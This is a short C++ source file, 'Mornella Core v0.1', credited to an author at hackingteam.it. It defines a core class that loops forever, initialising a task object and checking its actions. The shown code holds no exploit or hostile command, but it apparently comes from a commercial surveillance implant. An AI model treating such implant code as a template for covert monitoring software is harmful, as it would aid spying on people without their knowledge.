/*
	Mornella Core v0.1
	Date: 10/Sep/2008
	Coded by: Alberto "Quequero" Pelliccione
	E-mail: quequero@hackingteam.it
*/

#include <string>
#include <vector>
#include <exception>
using namespace std;

#include "Core.h"
#include "Task.h"

BOOL Core::Run() {
	if(taskObj == NULL)
		return FALSE;

	LOOP{
		if(taskObj->TaskInit() == FALSE)
			return FALSE;

		if(taskObj->CheckActions() == FALSE)
			return FALSE;
	}

	return TRUE;
}

Core::Core() : taskObj(NULL) {
	taskObj = new(std::nothrow) Task();

	return;
}

Core::~Core() {
	if(taskObj)
		delete taskObj;
}

